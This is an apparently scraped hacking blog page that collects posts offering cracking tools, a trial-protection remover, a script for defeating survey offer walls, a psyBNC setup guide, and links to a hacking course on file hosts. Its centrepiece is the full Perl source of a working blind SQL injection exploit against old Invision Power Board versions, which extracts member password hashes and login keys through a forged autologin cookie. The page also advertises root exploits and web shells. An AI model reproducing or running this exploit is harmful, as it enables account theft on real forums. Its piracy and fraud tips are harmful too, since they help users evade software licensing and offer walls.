Ksecurity-team

Subscribe & Don,t Miss A Free Hacking Course| Receive Daily Updates

Enter your email address:

Delivered by FeedBurner

RAR Password Cracker



This is very effective program, which can easily to crack RAR/WinRAR password, it use a dictionary and a brute force attack

RAR Password Cracker download
Website http://www.rarpasswordcracker.com/
Download Page http://www.rarpasswordcracker.com/rpc412_setup.exe
File size 205 Kb
License Freeware


Read More Add your Comment 0 comments


Date Cracker 2000



Data Cracker 2000 is an application which can easily remove the date protection(i.e. trail protection) from many software. It is very useful for shareware or trial versions of software which expire after a specific date. When you crack the software with Date Cracker 2000, the software will always show something like “There are 90 days remaining in your trial period” and the software will actually last forever :). Some programs have good protection and it isn’t possible to remove their date protection .


Date Cracker 2000 download
Website http://www.e-tech.ca/003-dc2000.asp
Download Page http://www.wonderworks.ca/nbia/dc20000.zip
File size 1.5 MB
Video Tutorial http://www.wonderworks.ca/nbia/dc2000.wmv


Read More Add your Comment 0 comments


Downloading from ShitCash - without filling any thing!





THIS IS NOT A BYPASS, BUT DOES THE JOB JUST LIKE ONE
This has a pretty good succeeding rate.





REQUIREMENTS:
- FireFox
- GreaseMonkey
- This script: http://adf.ly/3fLH <--- THIS DOES NOT REDIRECT TO SHITCASH OR ANY OTHER DOWNLOADING SITE!




So it works pretty easy, actually.

1. You just open your ShitCash page.

2. Choose an offer.

3. Press Ctrl + Shift + F and its all filled in with random stuff.
*IN SOME CASES TURN OF GREASEMONKEY BY CLICKING THE LITTLE MONKEY, IF SUBMITTED TURN ON AGAIN*

4. Now, submit the form, and your download unlocks most of the time.

Optional 5. If doesn't, clean your cookies, I recommend using this add-on:
https://addons.mozilla.org/nl/firefox/addon/3100/
and start at step 1.




Need a link to test it on?
Use this one:
http://adf.ly/6Zos

By  Maasie


Read More Add your Comment 0 comments


Install And Setting PsyBNC On Unix Shell



What is psyBNC?
psyBNC is an IRC network bouncer (BNC). psyBNC is short form of psychoid bouncer (BNC).
psyBNC is mostely used to hide your ip on IRC network and bounce your ISP. It is very easy to use and due to its unique features, it has become most popular BNC (specially on FREEBSD) .
psyBNC does not just bounce your ISP (hide your ip) it also stays connected to IRC server even after you close your irc client. Most of the users like this feature which made psyBNC most popular among bouncers.
Moreover there is multiple user feature included with psyBNC, multiple server support and much more. It also support IPV6.
Here I am going to let you know how to setup psyBNC on your shell in few easy steps.
How to setup (compile/install) bnc.
1.) type: wget http://www.psybnc.at/download/beta/psyBNC-2.3.2-7.tar.gz
Above command will download psybnc in your shell.
2.) type: tar -zxvf psyBNC-2.3.2-7.tar.gz
Above command will untar your downloaded psyBNC tar file. Now you have to change dir to psybnc so type command given below.
3.) type: cd psybnc
Now you are in directory called psyBNC-2.3.2-7
4.) type: make
Your psybnc is almost compiled now. After performing this command you will be asked some questions as below
Country Name [DE]:
State/Province [Somewhere]:
Locality Name (eg, city) []:
Organization Name (eg, company) [tCl]:
Organizational Unit Name (eg, section) [psyBNC]:
Common Name (Full domain of your server) []:
LEAVE all field blank if you dont want to answer.
Now you will have to edit psybnc.conf file to edit listening port.
5.) type: pico psybnc.conf
There you will see 3 lines in your psybnc.conf file. You just have to edit “PSYBNC.SYSTEM.PORT1=31337?. 31337 is default listening port. Change it to your choice of listening port.
I prefer you to chose any port between 10000 – 20000.
example: PSYBNC.SYSTEM.PORT1=15678
6.) type: ctrl (key)+x
(to save your psybnc.conf file)
7.) type: y + enter (key)
8.) type: ./psybnc psybnc.conf
Now you are ready to use your psyBNC
Kindle Wireless Reading Device, Wi-Fi, 6" Display, Graphite - Latest Generation


Read More Add your Comment 1 comments


The Hack-Counter Hack Training Course






The Hack-Counter Hack Training Course | English | RS | HF | ULD | 999MB

* Combination of talking-head video, slideshow presentation and video capture of actual screen shots
* Walks through setting up "lab" environment and then experimenting with tools on lab PC's
* Includes suite of hacker / security tools for both Windows and Linux platforms on CD
* Requires RealOne Player (freely available) because video presentation is in RealVideo format
* Good program to use in combination with Ed Skoudis' book: Counter Hack
* Mainly for beginners but may even provide some new tricks to seasoned gurus

CD1 Content
Session 1
# Understand the Purpose of the Course and the Phases of Hacking
# Acquire the Hardware and Software for Your Laboratory
# Build the Windows® 2000/XP Hacker Tool Analysis Laboratory
# Build the Linux Hacker Tool Analysis Laboratory
# Test Your Laboratory and Keep It Secure

Session 2
# Understand Low-Tech and Computer-Based Reconnaissance
# Use Sam Spade to Gather Information About Target
# Search the Web for Interesting Target Information

Session 3
# Understand Scanning Techniques
# Search for Modems Using THC-Scan
# Develop a Network Map Using Cheops-ng
# Conduct a Port Scan Using Nmap
# Scan for Vulnerabilities Using Nessus

CD2 Content
Session 4
# Analyze Buffer Overflows
# Passwords on Windows® and Linux
# Sniff Data from the Network Using Sniffit
# Use Netcat, the Swiss Army Knife™ of Hacker Tools

Session 5
# Analyze an Application-Level Trojan Horse Backdoor (VNC)
# Analyze a Traditional RootKit (LRK4)
# Analyze a Kernel-Level RootKit (Kernel Intrusion System)

Session 6
# Understand File Hiding in Windows®
# Understand File Hiding in UNIX
# Analyze Protocol Tunneling Using Reverse WWW Shell
# Analyze Covert Channels Using Covert_TCP



Download HotFile:
http://hotfile.com/dl/30681801/c9fcb36/Hack_Training_Video_Course_CD1.part1.rar.html
http://hotfile.com/dl/30681797/d5e1308/Hack_Training_Video_Course_CD1.part2.rar.html
http://hotfile.com/dl/30681886/749794e/Hack_Training_Video_Course_CD1.part3.rar.html
http://hotfile.com/dl/30681922/eb4db58/Hack_Training_Video_Course_CD1.part4.rar.html
http://hotfile.com/dl/30681925/56c9598/Hack_Training_Video_Course_CD1.part5.rar.html
http://hotfile.com/dl/30681926/c779bb9/Hack_Training_Video_Course_CD2.part1.rar.html
http://hotfile.com/dl/30681927/641f59a/Hack_Training_Video_Course_CD2.part2.rar.html
http://hotfile.com/dl/30681929/4a846b2/Hack_Training_Video_Course_CD2.part3.rar.html
http://hotfile.com/dl/30681931/22d7125/Hack_Training_Video_Course_CD2.part4.rar.html
http://hotfile.com/dl/30681935/6bc0a6c/Hack_Training_Video_Course_CD2.part5.rar.html

Download Sharingmatrix:
http://sharingmatrix.com/file/1996263/Hack Training Video Course CD1.part1.rar
http://sharingmatrix.com/file/1996255/Hack Training Video Course CD1.part2.rar
http://sharingmatrix.com/file/1996335/Hack Training Video Course CD1.part3.rar
http://sharingmatrix.com/file/1996345/Hack Training Video Course CD1.part4.rar
http://sharingmatrix.com/file/1996337/Hack Training Video Course CD1.part5.rar
http://sharingmatrix.com/file/1996383/Hack Training Video Course CD2.part1.rar
http://sharingmatrix.com/file/1996385/Hack Training Video Course CD2.part2.rar
http://sharingmatrix.com/file/1996389/Hack Training Video Course CD2.part3.rar
http://sharingmatrix.com/file/1996391/Hack Training Video Course CD2.part4.rar
http://sharingmatrix.com/file/1996387/Hack Training Video Course CD2.part5.rar

Download Uploading:
http://uploading.com/files/f6773cf1/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part1.rar/
http://uploading.com/files/ec19fem3/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part2.rar/
http://uploading.com/files/2647f23c/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part3.rar/
http://uploading.com/files/3mcmm1b4/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part4.rar/
http://uploading.com/files/48bm6faf/Hack%2BTraining%2BVideo%2BCourse%2BCD1.part5.rar/
http://uploading.com/files/fm216f43/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part1.rar/
http://uploading.com/files/cma4d258/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part2.rar/
http://uploading.com/files/c77429c7/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part3.rar/
http://uploading.com/files/14575adf/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part4.rar/
http://uploading.com/files/bd554e37/Hack%2BTraining%2BVideo%2BCourse%2BCD2.part5.rar/

Download Rapidshare:
http://rapidshare.com/files/357416955/Hack_Training_Video_Course_CD1.part1.rar.html
http://rapidshare.com/files/357416872/Hack_Training_Video_Course_CD1.part2.rar.html
http://rapidshare.com/files/357417783/Hack_Training_Video_Course_CD1.part3.rar.html
http://rapidshare.com/files/357417977/Hack_Training_Video_Course_CD1.part4.rar.html
http://rapidshare.com/files/357418131/Hack_Training_Video_Course_CD1.part5.rar.html
http://rapidshare.com/files/357418360/Hack_Training_Video_Course_CD2.part1.rar.html
http://rapidshare.com/files/357418252/Hack_Training_Video_Course_CD2.part2.rar.html
http://rapidshare.com/files/357418247/Hack_Training_Video_Course_CD2.part3.rar.html
http://rapidshare.com/files/357418298/Hack_Training_Video_Course_CD2.part4.rar.html
http://rapidshare.com/files/357418267/Hack_Training_Video_Course_CD2.part5.rar.html
Regards,
Adnan Anjum From http://hackguide4u.blogspot.com


Read More Add your Comment 2 comments


Tutorials



Courses

All Computer Courses
Ms Office
Adobe Photoshop
Adobe Flash
Corel Draw
Inpage Urdu
Adobe Premier
Adobe PageMaker
BlueVoda
Dreamviewer

All Courses Here in Zip and Document and Notes Formats

Watch Tips Tricks Here


Adobe Flash Course and Contents Download Here

Networking

Programming

PHP Urdu Tutorial



Read More Add your Comment 2 comments


Invision Power Board SQL injection exploit by RST/GHC



#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (&lt2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~]    SERVER : blah.com
## [~]      PATH : /ipb13/
## [~] MEMBER ID : 1
## [~]    TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com  /ipb202/ 1 1
## [~]    SERVER : blah.com
## [~]      PATH : /ipb202/
## [~] MEMBER ID : 1
## [~]    TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV &lt 4) { &usage; }

$server    = $ARGV[0];
$path      = $ARGV[1];
$member_id = $ARGV[2];
$target    = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~]    SERVER : $server\r\n";
print "[~]      PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~]    TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
 {
 if(length($allchar) &gt 0){
 print qq{\b\b DONE ]

 MEMBER ID : $member_id
 };
 print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
 print $allchar."\r\n";
 }
 else
 {
 print "\b\b FAILED ]";
 }
 exit();
 }
else
 {
  $allchar .= chr(42);
 }
$s_num++;
}

sub found($$)
 {
 my $fmin = $_[0];
 my $fmax = $_[1];
 if (($fmax-$fmin)&lt5) { $i=crack($fmin,$fmax); return $i; }

 $r = int($fmax - ($fmax-$fmin)/2);
 $check = " BETWEEN $r AND $fmax";
 if ( &check($check) ) { &found($r,$fmax); }
 else { &found($fmin,$r); }
 }

sub crack($$)
 {
 my $cmin = $_[0];
 my $cmax = $_[1];
 $i = $cmin;
 while ($i&lt$cmax)
  {
  $crcheck = "=$i";
  if ( &check($crcheck) ) { return $i; }
  $i++;
  }
 $i = 0;
 return $i;
 }

sub check($)
 {
 $n++;
 status();
 $ccheck = $_[0];
 $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
 $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
 $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
 $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
 $nmalykh    = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
 $socket = IO::Socket::INET-&gtnew( Proto =&gt "tcp", PeerAddr =&gt "$server", PeerPort =&gt "80");

 printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
 $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

 while(&lt$socket&gt)
  {
  if (/Set-Cookie: session_id=0;/) { return 1; }
  }

 return 0;
 }

sub status()
{
  $status = $n % 5;
  if($status==0){ print "\b\b/]";  }
  if($status==1){ print "\b\b-]";  }
  if($status==2){ print "\b\b\\]"; }
  if($status==3){ print "\b\b|]";  }
}

sub usage()
 {
 print q(
 Invision Power Board v &lt 2.0.4 SQL injection exploit
 ----------------------------------------------------
 USAGE:
 ~~~~~~
 r57ipb2.pl [server] [/folder/] [member_id] [target]

 [server]    - host where IPB installed
 [/folder/]  - folder where IPB installed
 [member_id] - user id for brute

 targets:
          0 - IPB 1.*
          1 - IPB 2.* (Prior To 2.0.4)

 e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
 ----------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
 );
 exit();
 }




Read More Add your Comment 0 comments


2007-2008-2009-2010-2011 local r00t exploit Click Download !




Read More Add your Comment 1 comments


All Good shells which hard to find




Read More Add your Comment 2 comments


Hack some facebook apps (apps.facebook.com vulnerable to SQL and html Injection )



 From Adnan Anjum Founder Of http://hackguide4u.blogspot.com
This is very strange think facebook have sql vulnerability





 Some info for all of you injector team broke facebook code
Special Thanks To TeAM inj3ct0r
Part 1 Original: http://inj3ct0r.com/exploits/11638
Part 2 Original: http://inj3ct0r.com/exploits/13403 


Read More Add your Comment 1 comments


 

Members

Join Us At Facebook

Enter your email address:

Delivered by FeedBurner

© 2011 Ksecurity-team All Rights Reserved Hackguide4u Theme by Adnan Anjum Learn Hacking Online hackguide4u.blogspot.com